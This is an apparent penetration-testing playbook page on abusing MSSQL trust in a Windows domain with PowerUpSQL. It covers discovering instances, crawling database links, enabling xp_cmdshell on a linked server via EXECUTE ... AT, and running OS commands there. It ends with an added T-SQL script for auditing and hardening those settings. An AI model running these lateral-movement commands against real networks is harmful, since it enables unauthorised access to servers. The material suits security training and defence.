# Trust Abuse - MSSQL Servers

MS SQL servers are usually deployed in large numbers in a Windows domain.

SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles.

For MSSQL and PowerShell hackery, let's use PowerUpSQL <https://github.com/NetSPI/PowerUpSQL>

Discovery (SPN Scanning)

```
Get-SQLInstanceDomain
```

Check Accessibility

```
Get-SQLConnectionTestThreaded

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose 
```

Gather Information

```
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```

## Database Links

* A database link allows a SQL Server to access external data sources such as other SQL Servers and OLE DB data sources.
* When the link is between SQL Servers (linked SQL servers), it is possible to execute stored procedures on the remote server.
* Database links work even across forest trusts.

Searching for Database Links:

```
# Look for links to remote servers

Get-SQLServerLink -Instance dcorp-mssql -Verbose
```

Enumerating Database Links Manually

* The openquery() function can be used to run queries on a linked database:

```
select * from openquery("dcorp-sql1",'select * from master..sysservers')
```

Enumerating Database Links

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
```

## Executing Commands

* On the target server, xp\_cmdshell must already be enabled; or
* If rpcout is enabled (it is disabled by default), xp\_cmdshell can be enabled using:

```
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"
```

* Use the -QueryTarget parameter to run the query on a specific instance (without -QueryTarget the command tries to use xp\_cmdshell on every link of the chain).

{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql
```

{% endcode %}
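The link crawl above only reaches the OS when a link has RPC Out (or data access) enabled and xp\_cmdshell is on. The T-SQL below is an added defender-side audit and hardening script, not part of the original playbook or of PowerUpSQL; it assumes sysadmin rights on the instance and uses `<LINKED_SERVER_NAME>` as a placeholder.

```sql
-- Added audit script (not from the original page or PowerUpSQL).
-- Run on each instance discovered by SPN scanning, as sysadmin.

-- 1. Linked servers and the options the attack path depends on:
--    is_rpc_out_enabled   -> needed for EXECUTE (...) AT "server"
--    is_data_access_enabled -> needed for openquery()
--    The login mapping shows whose context a remote query runs in.
SELECT s.name                  AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ll.remote_name          AS mapped_remote_login,
       ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 2. xp_cmdshell state: value_in_use = 1 means a crawled link can
--    execute OS commands on this host.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 3. Hardening: turn RPC Out off on links that only need data access.
--    '<LINKED_SERVER_NAME>' is a placeholder for a name from query 1.
EXEC sp_serveroption @server  = N'<LINKED_SERVER_NAME>',
                     @optname = N'rpc out',
                     @optvalue = N'false';

-- 4. Hardening: disable xp_cmdshell when nothing legitimate uses it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Re-run queries 1 and 2 after the hardening steps; any link still reporting `is_rpc_out_enabled = 1` is a candidate for the crawl described in this section.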
